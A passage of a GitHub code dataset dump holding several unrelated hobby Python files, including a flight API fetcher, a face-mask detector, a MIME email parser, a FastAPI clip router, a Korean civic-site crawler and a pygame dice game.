{}\".format(current_balance))\n\n\n# main routine\nif __name__ == \"__main__\":\n root = Tk()\n root.title(\"Temperature Converter\")\n something = Start(root)\n root.mainloop()\n\n","repo_name":"sarahwade/mysterybox","sub_path":"start_GUI.py","file_name":"start_GUI.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3469395897","text":"#!/usr/bin/env python3\n\nimport json\nimport requests\n\nTOKEN = \"xxx\"\n\nparams = {\n 'access_key': TOKEN,\n 'limit': '1',\n}\n\napi_result = requests.get('http://api.aviationstack.com/v1/flights', params)\n\napi_response = api_result.json()\nwith open('mydata.json', 'w') as f:\n json.dump(api_response, f)\n\n","repo_name":"WikF/flights-storage","sub_path":"old/flight_fetcher.py","file_name":"flight_fetcher.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21229631315","text":"import cv2\nimport numpy as np\n\nfrom model import initialize\n\nface = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nfont = cv2.FONT_HERSHEY_SIMPLEX\nmodel = initialize()\n\n\nclass VideoCamera(object):\n \n def __init__(self):\n self.video = cv2.VideoCapture(0)\n \n def __del__(self):\n self.video.release()\n \n def get_frame(self):\n _, fr = self.video.read()\n img = cv2.cvtColor(fr, cv2.COLOR_BGR2RGB)\n m = 0\n# img = cv2.resize(img, (224+m, 224+m))\n\n faces = face.detectMultiScale(img, scaleFactor=1.3, minNeighbors=3)\n\n for (x, y, w, h) in faces:\n fc = img[y-m:y+h+m, x-m:x+w+m]\n pred = model.predict(fc)\n cv2.putText(fr, pred, (x, y), font, 1, (255, 255, 0), 2)\n cv2.rectangle(fr,(x,y),(x+w,y+h),(255,0,0),2)\n# break\n \n _, jpeg = cv2.imencode('.jpg', fr)\n return jpeg.tobytes()","repo_name":"HassanRady/Face-Mask-Detector","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"15800961057","text":"#!/usr/bin/python3\n#coding=utf-8\n\n\"\"\"\nFile: mime.py\nDescription: the MIME email parser, reference from:\n \nAuthor: 0x7F@knownsec404\nTime: 2021.06.25\n\"\"\"\n\nimport mimetypes\nimport os\nfrom email.header import decode_header, make_header\nfrom email.message import EmailMessage\nfrom email.parser import Parser\n\n#**********************************************************************\n# @Class: Email\n# @Description: the emailbot warpped Email class, support mutual conversion\n# between MIME format and plaintext.\n#**********************************************************************\nclass Email:\n #**********************************************************************\n # @Function: __init__(self, sender=\"\", receiver=\"\", cc=\"\", subject=\"\", content=\"\",\n # attachment=\"\", source=\"\"):\n # @Description: Email object initialize, and auto convert another format\n # set plaintext email content, it will auto convert to MIME, otherwise.\n # @Parameter: sender=\"\", the email sender\n # @Parameter: receiver=\"\", the email receiver\n # @Parameter: cc=\"\", the email carbon copy\n # @Parameter: subject=\"\", the email subject\n # @Parameter: content=\"\", the email content\n # @Parameter: attachment=\"\", the email attachment file path\n # @Parameter: source=\"\", the MIME email source data\n # @Return: None\n #**********************************************************************\n def __init__(self, sender=\"\", receiver=\"\", cc=\"\", subject=\"\", content=\"\",\n attachment=\"\", source=\"\"):\n # initliaze field\n self.sender = sender\n self.receiver = receiver\n self.cc = cc\n self.subject = subject\n self.content = content\n self.attachment = attachment\n self.source = source\n # MIME object\n self.MIME = None\n\n # convert email string to MIME, or MIME source to string\n if self.source == \"\":\n self._pack()\n else:\n self._unpack()\n # end __init()\n\n #**********************************************************************\n # @Function: _pack(self)\n # @Description: convert plaintext email to MIME email\n # @Parameter: None\n # @Return: None\n #**********************************************************************\n def _pack(self):\n # create the container email message.\n self.MIME = EmailMessage()\n # set email item into MIME format\n self.MIME['Subject'] = self.subject\n self.MIME['From'] = self.sender\n self.MIME['To'] = self.receiver\n self.MIME['Cc'] = self.cc\n self.MIME.set_content(self.content)\n \n # set attachment into MIME if need\n if self.attachment == None or self.attachment == \"\":\n return\n # read attachment content\n try:\n with open(self.attachment, \"rb\") as f:\n data = f.read()\n except Exception as e:\n logger.error(e)\n return\n # get attachment type\n types, _ = mimetypes.guess_type(self.attachment)\n if types == None:\n # no guess could be made, use a generic bag-of-bits type.\n types = 'application/octet-stream'\n # end if\n maintype, subtype = types.split('/')\n filename = os.path.basename(self.attachment)\n self.MIME.add_attachment(data, maintype=maintype, subtype=subtype, filename=filename)\n # end _pack()\n\n #**********************************************************************\n # @Function: _unpack(self)\n # @Description: convert MIME email to plaintext\n # @Parameter: None\n # @Return: None\n #**********************************************************************\n def _unpack(self):\n # parse the email string to a MIMEMessage object.\n msg = Parser().parsestr(self.source)\n\n # 1.parse header\n self.sender = self._get_header(msg, \"From\", \"\")\n self.receiver = self._get_header(msg, \"To\", \"\")\n self.cc = self._get_header(msg, \"Cc\", \"\")\n self.subject = self._get_header(msg, \"Subject\", \"\")\n\n # 2.parse body\n # if the email contains multiple part\n self.content = self._parse_content(msg)\n # end _unpack()\n\n #**********************************************************************\n # @Function: _get_header(self, msg, key, default)\n # @Description: parse email header data from MIME, and decode with UTF-8\n # @Parameter: msg, the MIME message object\n # @Parameter: key, the key of value\n # @Parameter: default, the default value\n # @Return: value, the value of header field\n #**********************************************************************\n def _get_header(self, msg, key, default):\n # get value by key with default\n value = msg.get(key, default)\n # decode default method\n return str(make_header(decode_header(value)))\n\n #**********************************************************************\n # @Function: _parse_content(self, msg)\n # @Description: parse email content data from MIME, and decode with UTF-8\n # @Parameter: msg, the MIME message object\n # @Return: result, the message plaintext content\n #**********************************************************************\n def _parse_content(self, msg):\n content_type = msg.get_content_type().lower()\n result = \"\"\n\n # if the message part is text part\n if content_type == \"text/plain\" or content_type == \"text/html\":\n # get text content.\n content = msg.get_payload(decode=True)\n charset = msg.get_charset()\n if charset == None:\n # set default charset \"utf-8\"\n charset = \"utf-8\"\n # get message \"Content-Type\" header value.\n ct = msg.get(\"Content-Type\", \"\").lower()\n pos = ct.find(\"charset=\")\n if pos >= 0:\n charset = ct[pos+8:].strip()\n pos = charset.find(\";\")\n if pos >= 0:\n charset = charset[0:pos]\n # end if\n # end if\n # end if\n # the encoding in the email may be incorrect, we need to handle\n # with the exception\n try:\n result = content.decode(charset)\n except:\n logger.error(\"content decode failed (%s)\" % str(content))\n result = \"\"\n\n # if this message part is still multipart such as:\n # 'multipart/mixed', 'multipart/alternative', 'multipart/related'\n elif content_type.startswith(\"multipart\"):\n parts = msg.get_payload()\n # loop in the multiple part list.\n for part in parts:\n # parse each message part.\n result += self._parse_content(part)\n\n # if this message part is an attachment part that means it is a attached file\n elif content_type.startswith(\"image\") or content_type.startswith(\"application\"):\n # pass, we not to parse atttachment\n \"\"\"\n # get message header 'Content-Disposition''s value and parse out attached file name.\n attach_file_info_string = msg.get('Content-Disposition')\n prefix = 'filename=\"'\n pos = attach_file_info_string.find(prefix)\n attach_file_name = attach_file_info_string[pos + len(prefix): len(attach_file_info_string) - 1]\n \n # get attached file content.\n attach_file_data = msg.get_payload(decode=True)\n # get current script execution directory path. \n current_path = os.path.dirname(os.path.abspath(__file__))\n # get the attached file full path.\n attach_file_path = current_path + '/' + attach_file_name\n # write attached file content to the file.\n with open(attach_file_path,'wb') as f:\n f.write(attach_file_data)\n \"\"\"\n else:\n # pass, we not to parse other type\n \"\"\"\n result = msg.as_string()\n \"\"\"\n # end if\n return result\n # end _parse_content()\n\n #**********************************************************************\n # @Function: __repr__(self)\n # @Description: rewrite __str__ function, print complete \"Email\" plaintext\n # @Parameter: None\n # @Return: str\n #**********************************************************************\n def __repr__(self):\n text = f\"Subject: {self.subject}\\n\"\n text += f\"From: {self.sender}\\n\"\n text += f\"To: {self.receiver}\\n\"\n text += f\"Cc: {self.cc}\\n\"\n text += f\"\\n{self.content}\\n\"\n text += f\"Attachment: {self.attachment}\"\n return text\n # end __repr__()\n\n #**********************************************************************\n # @Function: __str__(self)\n # @Description: rewrite __str__ function, just call __repr__()\n # @Parameter: None\n # @Return: str\n #**********************************************************************\n def __str__(self):\n return self.__repr__()\n # end __str__()\n# end class\n","repo_name":"0x7Fancy/EmailBot","sub_path":"mime.py","file_name":"mime.py","file_ext":"py","file_size_in_byte":9294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14493379047","text":"import io, os, time\nimport datetime as dt\n\nfrom fastapi import APIRouter\nfrom starlette.requests import Request\nfrom starlette.responses import StreamingResponse, FileResponse\n\nfrom util import log, resize_image\nfrom api.models import ResponseModel\nfrom api.clips import Clips\nfrom adapters.fastapi import MediaResponse, APIException\n\nrouter = APIRouter()\npublic_router = APIRouter()\n\n@router.get(\"/clips\")\ndef clips_list(request: Request, camera: str = \"\", category: str = \"\", date: str = \"\"):\n\n api = Clips()\n # format: /clips/list?camera=&category=&date=20200620\n timestamp = int(time.time())\n if len(date) > 0:\n ts = dt.datetime(year=int(date[:4]), month=int(date[4:6]), day=int(date[6:]))\n timestamp = int(time.mktime(ts.timetuple()))\n\n success = True\n results = []\n\n clips = api.get_clips(camera, category, timestamp)\n if clips:\n for clip in clips:\n camera_data = request.app.camera_manager.get(camera)\n results.append({\n \"timestamp\": clip[\"start_time\"],\n \"camera\": {\n \"id\": clip[\"camera\"],\n \"name\": camera_data.name if camera_data else \"[deleted]\"\n },\n \"thumbnail_url\": api.generate_video_url(clip, \"thumbnail\"),\n \"video_url\": api.generate_video_url(clip, \"video\"),\n \"objects\": clip[\"objects\"]\n })\n\n return {\n \"success\": True,\n \"results\": results,\n \"meta\": {\n \"timezone\": api.get_timezone()\n }\n }\n\n@public_router.get(\"/clips/{id}/video/{timestamp}\")\ndef video(request: Request, id: str, timestamp: int):\n\n api = Clips()\n filepath = api.get_video(id, timestamp)\n\n if filepath == False:\n raise APIException(status_code=404)\n\n return MediaResponse(path=filepath, status_code=206, request_headers=request.headers)\n\n@public_router.get(\"/clips/{id}/thumbnail/{timestamp}\")\ndef thumbnail(request: Request, id: str, timestamp: int, resize_to: int = 0):\n\n api = Clips()\n filepath = api.get_thumbnail(id, timestamp)\n if filepath == False:\n raise APIException(status_code=404)\n\n if resize_to > 0:\n with open(filepath, \"rb\") as handle:\n image = handle.read()\n return StreamingResponse(io.BytesIO(resize_image(image, resize_to)), media_type=\"image/jpeg\")\n\n return FileResponse(filepath, media_type=\"image/jpeg\")\n","repo_name":"bzzeke/camera","sub_path":"app/api/routes/clips.py","file_name":"clips.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40995471640","text":"input_file = input(\"Choose the input file name (case sensitive!)\\n\")\r\nfi = open(input_file,'r')\r\n#Read first line to skip column header\r\nfi.readline()\r\n\r\noutput_file = input(\"Choose the output file name (case sensitive!\\n\")\r\nfo = open(output_file,'w')\r\nfo.write(\"abscice\\ valeur\\n\")\r\n\r\n#used variable \r\nis_peak = False\r\nmax_peak = None\r\n\r\nfor line in fi:\r\n #used to treat each line\r\n line = line.strip(\"\\n\")\r\n values = line.split(\";\")\r\n values[1] = values[1][:6]\r\n values[1] = float(values[1])\r\n \r\n if (is_peak):\r\n \r\n #Used to detect the speak end, 1 is an arbitrary value set viewing latis graph)\r\n if (values[1] < 1):\r\n fo.write(max_peak[0]+\" \"+str(max_peak[1])+'\\n')\r\n is_peak = False\r\n max_peak = None\r\n \r\n else:\r\n\r\n #Update maximum in the peak\r\n if (values[1] > max_peak[1]):\r\n max_peak = values\r\n else:\r\n\r\n #Used to detect the speak start, 1 is an arbitrary value set viewing latis graph)\r\n if (values[1] > 1):\r\n is_peak = True\r\n max_peak = values\r\n\r\n#Close file\r\nfo.close()\r\nfi.close()\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"xyo-toy/TipeTool","sub_path":"TipeTool.py","file_name":"TipeTool.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2103298221","text":"# coding=utf-8\n\nimport requests\n\nfrom allauth.socialaccount.models import SocialLogin, SocialToken, SocialApp, SocialAccount\nfrom allauth.socialaccount.providers.facebook.views import fb_complete_login\nfrom allauth.socialaccount.providers.oauth2.views import OAuth2Adapter\nfrom allauth.socialaccount.helpers import complete_social_login\n\nfrom applications.accounts.serializer import UserProfileSerializer\n\nFB_GRAPH_API_USER_DATA_URL = 'https://graph.facebook.com/me?fields=id,name&access_token='\n\n\nclass UserSocialRegisterMixin(OAuth2Adapter):\n\n def facebook_signup(self, request, access_token):\n try:\n app = SocialApp.objects.get(provider=\"facebook\")\n token = SocialToken(app=app, token=access_token)\n\n fb_login = fb_complete_login(request, app, token)\n fb_login.token = token\n fb_login.state = SocialLogin.state_from_request(request)\n\n ret = complete_social_login(request, fb_login)\n\n response_data = {}\n\n if request.user.is_authenticated():\n if request.user.username == \"\":\n request.user.username = request.data['email']\n request.user.email = request.data['email']\n request.user.first_name = request.data['fname']\n request.user.last_name = request.data['lname']\n request.user.save()\n data = UserProfileSerializer(request.user).data\n return data\n else:\n return {\n 'error': \"User with this email already exists.\"\n }\n except Exception as e:\n return {\n 'error': str(e)\n }\n\n def validate_facebook_userdata(self, request, accesstoken):\n\n request_data = request.data\n keys = request_data.keys()\n\n url = FB_GRAPH_API_USER_DATA_URL+accesstoken\n resp = requests.get(url=url)\n fb_user_data = resp.json()\n request_user_data = {'first_name':request_data.get('fname'),'last_name':request_data.get('lname'),'email':request_data.get('email')}\n\n valid = all(item in fb_user_data.items() for item in request_user_data.items())\n return valid\n\n def validate_social_account(self, access_token, provider):\n can_signup = False\n if provider == 'facebook':\n url = FB_GRAPH_API_USER_DATA_URL+access_token\n resp = requests.get(url=url)\n fb_user_data = resp.json()\n if 'id' in fb_user_data.keys():\n can_signup = True\n uid = fb_user_data['id']\n accounts = SocialAccount.objects.filter(uid=uid, provider='facebook')\n return (True,can_signup) if accounts.count() > 0 else (False,can_signup)\n return (False,can_signup)\n\n\n\n\n\n","repo_name":"febinstephen/facebook-api","sub_path":"applications/accounts/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3914230351","text":"# 문제 https://www.acmicpc.net/problem/1010\n# 조합 이용해서 풀 수 있음 \nimport math \ntest_num = int(input())\n\nfor i in range(test_num):\n # 서쪽 사이트의 개수는 n, 동쪽 사이트의 개수 m ( n <= m )\n # mCn : 서로 다른 m개 중에 순서 고려하지 않고 n개 선택 \n # mCn = m! / n!(m-n)!\n n, m = map(int,input().split())\n result = math.factorial(m) // (math.factorial(n) * math.factorial(m-n))\n print(result)","repo_name":"pjw5521/Coding_Test_Algorithm","sub_path":"Baekjoon_Algorithm/6. Dynamic Programming/1010 다리 놓기.py","file_name":"1010 다리 놓기.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1671155186","text":"# !/usr/bin/env python\n# coding: utf-8\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup\nfrom time import sleep\nimport requests\nimport re\nimport pandas as pd\nimport numpy as np\nimport os\nimport csv\nimport urllib.parse\n\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\n\nimport warnings\nwarnings.filterwarnings('ignore')\nimport time\n\n### 가치더함 사이트접속\n\naddress_jejudsi=\"https://jejudsi.kr/issue.htm\"\nheader = {'User-Agent': ''}\nd = webdriver.Chrome('./chromedriver.exe')\nd.implicitly_wait(3)\nd.get(address_jejudsi)\n\nreq = requests.get(\"https://www.jejudsi.kr/issue.htm\", verify=False)\nhtml = req.text\nsoup = BeautifulSoup(html, \"html.parser\")\n\n# 프로젝트 제목\nxpath_tit_new = f'/html/body/div[1]/section/div/div/div[2]/div/div/div/div/div[4]/div[1]/div[1]/div[{1}]/div/div[3]/div[3]/a'\ntitle_new = d.find_element(By.XPATH,xpath_tit_new).text\ntitle = d.find_element(By.CLASS_NAME, 'issue-tit').text\n\nxpath_tit_proj = f'/html/body/div[1]/section/div/div/div[2]/div/div/div/div/div[7]/div[1]/div[2]/div[{2}]/div/div[3]/div[3]/a'\ntitle_proj = d.find_element(By.XPATH,xpath_tit_proj).text\n\nxpath_tit_end = f'/html/body/div[1]/section/div/div/div[2]/div/div/div/div/div[7]/div[1]/div[2]/div[{3}]/div/div[3]/div[3]/a'\ntitle_end = d.find_element(By.XPATH,xpath_tit_end).text\n\n# 프로젝트 페이지 링크 \n\nhtml_2 = d.page_source\nsoup_2 = BeautifulSoup(html_2, \"html.parser\")\nlist_issueTit = soup_2.find_all('div', attrs={\"class\" : \"issue-tit\"})\n\nurl_issueTit = list()\n\nfor i in list_issueTit :\n url_issueTit.append(i.a['href'])\n\nfor p in range(2, 9+1):\n xpath_cate = f'/html/body/div[1]/section/div/div/div[2]/div/div/div/div/nav/div[2]/ul/li[{p}]/a'\n d.find_element(By.XPATH,xpath_cate).click()\n category = d.find_element(By.XPATH,xpath_cate).text # 카테고리\n print(category)\n\n # 더보기 무한 클릭\n path_more ='/html/body/div[1]/section/div/div/div[2]/div/div/div/div/div[7]/div[2]/a'\n while True :\n try :\n d.find_element(By.XPATH,path_more).click()\n except :\n break\n\ndef savecsv(data):\n #저장할 파일의 파일명\n filename = 'index.csv'\n\n #데이터의 중복여부 확인을 위한 파일 읽기\n existing_data = set()\n try:\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n next(reader) #첫번째 행 건너뛰기\n for row in reader(f):\n existing_data(tuple(row))\n except FileNotFoundError:\n pass\n\n new_data = []\n for d_ in data:\n if tuple(d.values()) not in existing_data:\n new_data.append(d_)\n\n with open(filename, 'a', newline='', encoding = 'utf-8') as f:\n fieldnames = ['id 값', '제목', '분류', \n 'page', '프로젝트 시작', '프로젝트 종류',\n '상세 내용', '제안의 시작', '주요제안(문제정의)', \n '해결방안', '링크', '미추진 사유',\n '공감투표 참여안내', '참고자료']\n \n writer = csv.DictWriter(f, fieldnames = fieldnames)\n\n if not existing_data:\n writer.writeheader()\n for d in new_data:\n writer.writerow(d)\n\n# 크롤링하는 함수\ndef page_crawler(): \n col = [\n 'id 값'\n ,'page'\n ,'제목'\n ,'분류'\n ,'프로젝트 시작'\n ,'프로젝트 종류'\n ,'상세 내용'\n ,'제안의 시작'\n ,'주요제안(문제정의)'\n ,'해결방안'\n ,'링크'\n ,'미추진 사유'\n ,'공감투표 참여안내'\n ,'참고자료'\n ]\n df = pd.DataFrame(columns=col)\n \n cleantext_reason = list()\n cleantext_content = list()\n cleantext_cuase = list()\n cleantext_suggestion = list()\n cleantext_solution = list()\n cleantext_vote = list()\n cleantext_reference = list()\n\n # 링크에서 id값 추출 \n path_link = d.current_url\n page_no = d.current_url.replace(\"https://jejudsi.kr/issue/\", \"\").replace(\"#!#none\",\"\").split(\"/\")\n page_id = page_no[0]\n page = page_no[1]\n print(page)\n print(\"id : \" + page + \"(\" \"link : \" + path_link + \")\") \n \n # 프로젝트 종류/진행상황\n path_status ='/html/body/div[1]/section/div[1]/div/p[1]/span'\n status = d.find_element(By.XPATH, path_status).text\n print(status)\n\n # 프로젝트 시작날짜 시점\n try : \n path_period = '/html/body/div[1]/ction/div[2]/div/div[3]/div[1]/div[1]/div/div[2]/h3' # 공감투표 기간이 표시된 태그의 XPath.\n period = d.find_element(By.XPATH, path_period).text.replace(\"공감투표기간 : \",\"\").split(\" ~ \") # period: 시작 날짜와 종료 날짜를 나타내는 문자열. 이 문자열에서 replace() 메서드를 사���하여 \"공감투표기간 : \"을 제거한 후, split() 메서드를 사용하여 시작 날짜와 종료 날짜를 분리.\n start = period[0] \n end = period[1] \n except :\n start = np.nan\n end = np.nan\n print(\"date : \" + path_period)\n\n # 내용 수집\n html_test = d.page_source\n soup_test = BeautifulSoup(html_test, \"html.parser\")\n\n # mt-3 섹션\n list_test = soup_test.find_all('div', attrs={\"class\" : \"card mt-3\"})\n\n list_list_test = list()\n for i_list_test in list_test:\n cleantext = i_list_test.text\n i_list_test = re.sub(\"\\xa0\",'', cleantext) # \\n 삭제.\n\n if '미추진 사유' in i_list_test[:14] :\n cleantext_reason.append(i_list_test)\n cleantext_content.append(\"\")\n cleantext_cuase.append(\"\")\n cleantext_suggestion.append(\"\")\n cleantext_solution.append(\"\")\n cleantext_vote.append(\"\")\n cleantext_reference.append(\"\")\n\n elif '상세 내용' in i_list_test[:14] :\n cleantext_reason.append(\"\")\n cleantext_content.append(i_list_test[8:])\n cleantext_cuase.append(\"\")\n cleantext_suggestion.append(\"\")\n cleantext_solution.append(\"\")\n cleantext_vote.append(\"\")\n cleantext_reference.append(\"\")\n\n elif '제안의 시작' in i_list_test[:14] :\n cleantext_reason.append(\"\")\n cleantext_content.append(\"\")\n cleantext_cuase.append(i_list_test.replace(\"\\n\\n제안의 시작 (문제정의)\\n\",\"\"))\n cleantext_suggestion.append(\"\")\n cleantext_solution.append(\"\")\n cleantext_vote.append(\"\")\n cleantext_reference.append(\"\")\n\n elif '주요제안' in i_list_test[:14] :\n cleantext_reason.append(\"\")\n cleantext_content.append(\"\")\n cleantext_cuase.append(\"\")\n cleantext_suggestion.append(i_list_test[12:]) #'주요제안(문제정의)[12:]'빼기\n cleantext_solution.append(\"\")\n cleantext_vote.append(\"\")\n cleantext_reference.append(\"\")\n\n elif '해결방안' in i_list_test[:14] :\n cleantext_reason.append(\"\")\n cleantext_content.append(\"\")\n cleantext_cuase.append(\"\")\n cleantext_suggestion.append(\"\")\n cleantext_solution.append(i_list_test[6:]) \n cleantext_vote.append(\"\")\n cleantext_reference.append(\"\")\n\n elif '공감투표' in i_list_test[:14] :\n cleantext_reason.append(\"\")\n cleantext_content.append(\"\")\n cleantext_cuase.append(\"\")\n cleantext_suggestion.append(\"\")\n cleantext_solution.append(\"\") \n cleantext_vote.append(i_list_test[10:])\n cleantext_reference.append(\"\")\n\n elif '관련 자료' in i_list_test[:14] :\n cleantext_reason.append(\"\")\n cleantext_content.append(\"\")\n cleantext_cuase.append(\"\")\n cleantext_suggestion.append(\"\")\n cleantext_solution.append(\"\") \n cleantext_vote.append(\"\")\n cleantext_reference.append(i_list_test[12:])\n\n else : \n pass\n else:\n pass\n\n # mt-t-10 섹션\n list_test = soup_test.find_all('div', attrs={\"class\" : \"card m-t-10\"})\n list_list_test = list()\n\n for i_list_test in list_test :\n cleantext = i_list_test.text\n i_list_test = re.sub(\"\\xa0\",'', cleantext) # \\n 삭제.\n\n if '미추진 사유' in i_list_test[:14] :\n cleantext_reason.append(i_list_test)\n cleantext_content.append(\"\")\n cleantext_cuase.append(\"\")\n cleantext_suggestion.append(\"\")\n cleantext_solution.append(\"\")\n cleantext_vote.append(\"\")\n cleantext_reference.append(\"\")\n\n elif '상세 내용' in i_list_test[:14] :\n cleantext_reason.append(\"\")\n cleantext_content.append(i_list_test[6:])\n cleantext_cuase.append(\"\")\n cleantext_suggestion.append(\"\")\n cleantext_solution.append(\"\")\n cleantext_vote.append(\"\")\n cleantext_reference.append(\"\")\n\n elif '제안의 시작' in i_list_test[:14] :\n cleantext_reason.append(\"\")\n cleantext_content.append(\"\")\n cleantext_cuase.append(i_list_test.replace(\"\\n\\n제안의 시작 (문제정의)\\n\",\"\"))\n cleantext_suggestion.append(\"\")\n cleantext_solution.append(\"\")\n cleantext_vote.append(\"\")\n cleantext_reference.append(\"\")\n\n elif '주요제안' in i_list_test[:14] :\n cleantext_reason.append(\"\")\n cleantext_content.append(\"\")\n cleantext_cuase.append(\"\")\n cleantext_suggestion.append(i_list_test[12:]) #'주요제안(문제정의)[12:]'빼기\n cleantext_solution.append(\"\")\n cleantext_vote.append(\"\")\n cleantext_reference.append(\"\")\n\n elif '해결방안' in i_list_test[:14] :\n cleantext_reason.append(\"\")\n cleantext_content.append(\"\")\n cleantext_cuase.append(\"\")\n cleantext_suggestion.append(\"\")\n cleantext_solution.append(i_list_test[6:]) \n cleantext_vote.append(\"\")\n cleantext_reference.append(\"\")\n\n elif '공감투표' in i_list_test[:14] :\n cleantext_reason.append(\"\")\n cleantext_content.append(\"\")\n cleantext_cuase.append(\"\")\n cleantext_suggestion.append(\"\")\n cleantext_solution.append(\"\") \n cleantext_vote.append(i_list_test[10:])\n cleantext_reference.append(\"\")\n\n elif '관련 자료' in i_list_test[:14] :\n cleantext_reason.append(\"\")\n cleantext_content.append(\"\")\n cleantext_cuase.append(\"\")\n cleantext_suggestion.append(\"\")\n cleantext_solution.append(\"\") \n cleantext_vote.append(\"\")\n cleantext_reference.append(i_list_test[12:])\n\n else : \n pass\n\n else :\n pass\n\n df = pd.read_csv(\"_index.csv\", encoding = \"utf-8-sig\")\n df.drop_duplicates(subset=['page', '제목', '분류', '프로젝트 시작', '프로젝트 종류'])\n df = df.append(new_row,ignore_index=True) # 새로운 행 추가\n df.to_csv(\"_index.csv\", encoding=\"utf-8-sig\", index=False)\n\n new_row = pd.DataFrame({\n 'id 값' : page_id\n ,'제목' : title\n ,'분류' : category\n ,'page' : page \n ,'프로젝트 시작' : start\n ,'프로젝트 종류' : status\n ,'상세 내용' : cleantext_content\n ,'제안의 시작' : cleantext_cuase\n ,'주요제안(문제정의)' : cleantext_suggestion\n ,'해결방안' : cleantext_solution\n ,'링크' : path_link\n ,'미추진 사유' : cleantext_reason\n ,'공감투표 참여안내' : cleantext_vote\n ,'참고자료' : cleantext_reference\n }, index=[0])\n return new_row\n\nlist_tag_issueTit = list()\npage_tag = [\"PROPOSE\", \"RESPONSE\", \"PROJECT\"]\n\nfor j in list_tag_issueTit:\n for i in page_tag:\n d.get(f'https://jejudsi.kr{j}/{i}')\n\n path_not_page = '//*[@id=\"main\"]/div/div/div[2]/div/div/div[1]/div'\n not_page = d.find_element(By.XPATH, path_not_page).text\n\n if not_page == \"불편을 드려 죄송합니다.\":\n pass\n time.sleep(1)\n else:\n test = page_crawler()\n time.sleep(1)\n\n df = pd.concat([df, test])\n df.head()","repo_name":"hyen3030/_DATAEDU","sub_path":"2. 크롤링 파일/가치더함/가치더함_230405_송현준.py","file_name":"가치더함_230405_송현준.py","file_ext":"py","file_size_in_byte":12801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36426614237","text":"import pygame\nimport random\nfrom sys import exit\nfrom operator import itemgetter\n\n\npygame.init()\n\n# Getting clock info\ncurrent_time = 0\ntime_when_pressed = 0\n\n# Defining the screen size\nWIDTH = 610\nHEIGHT = 600\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('dice-game')\n\nclock = pygame.time.Clock()\n\n# Loading the images for the die.\ndice_imgs = [\n pygame.image.load('dice-game/Sprites/Dice-1.png').convert_alpha(),\n pygame.image.load('dice-game/Sprites/Dice-2.png').convert_alpha(),\n pygame.image.load('dice-game/Sprites/Dice-3.png').convert_alpha(),\n pygame.image.load('dice-game/Sprites/Dice-4.png').convert_alpha(),\n pygame.image.load('dice-game/Sprites/Dice-5.png').convert_alpha(),\n pygame.image.load('dice-game/Sprites/Dice-6.png').convert_alpha()\n]\n\ndice_size = (64, 64)\n\ndice_surfs = [\n pygame.transform.scale(dice_imgs[0], dice_size),\n pygame.transform.scale(dice_imgs[1], dice_size),\n pygame.transform.scale(dice_imgs[2], dice_size),\n pygame.transform.scale(dice_imgs[3], dice_size),\n pygame.transform.scale(dice_imgs[4], dice_size),\n pygame.transform.scale(dice_imgs[5], dice_size)\n]\n\n# Creating the \"Play\" Button and Results Display\nbutton_img = pygame.image.load(\n 'dice-game/Sprites/unnpressed.png').convert_alpha()\nstart_img = pygame.transform.scale(button_img, (130, 85))\n\nbutton_font = pygame.font.Font('dice-game/font/Pixeltype.ttf', 50)\n\nclass Button():\n def __init__(self, x, y, image):\n self.image = image\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n self.clicked = False\n\n def draw(self):\n global play\n # get mouse position\n pos = pygame.mouse.get_pos()\n action = False\n if self.rect.collidepoint(pos):\n if pygame.mouse.get_pressed()[0] == 1 and self.clicked == False:\n self.clicked == True\n action = True\n\n if pygame.mouse.get_pressed()[0] == 0:\n self.clicked = False\n action = False\n\n # draw button on screen\n screen.blit(self.image, (self.rect.x, self.rect.y))\n\n return action\n \n \n def reset(self):\n global rand\n rand = []\n for c, i in enumerate(dice_rects):\n rand.append(random.randint(0, 5))\n play = True \n run = False\n\n\n\n\n# create button instance\nstart_button = Button(300, 300, start_img)\nagain_button = Button(300, 300, start_img)\n\nfirst_surf = button_font.render('First Place!', False, 'Black')\nsecond_surf = button_font.render('Second Place', False, \"Black\")\nthird_surf = button_font.render('Third Place', False, 'Black')\nfourth_surf = button_font.render('Fourth Place...', False, 'Black')\nfifth_surf = button_font.render(' Tie!', False, 'Black')\n\n# Defining the coordinates for each dice in the list, appending each to the dice rectangles list through the loop.\ndice_rects = []\ndice_rects_coord = [\n (250, 500), (350, 500), (500, 250), (500,\n 350), (100, 250), (100, 350), (250, 100), (350, 100)\n]\nfor i in range(len(dice_rects_coord)):\n dice_rects.append(dice_surfs[1].get_rect(\n center=dice_rects_coord[i]))\n\n# Randomizing the sprite for the dice.\nrand = []\nfor c, i in enumerate(dice_rects):\n rand.append(random.randint(0, 5))\n\nplay = False\nrun = True\n# Start running the game.\nwhile run:\n # Here we get all the player input from mouse and keyboard.\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit\n exit()\n if event.type == pygame.MOUSEBUTTONUP:\n if 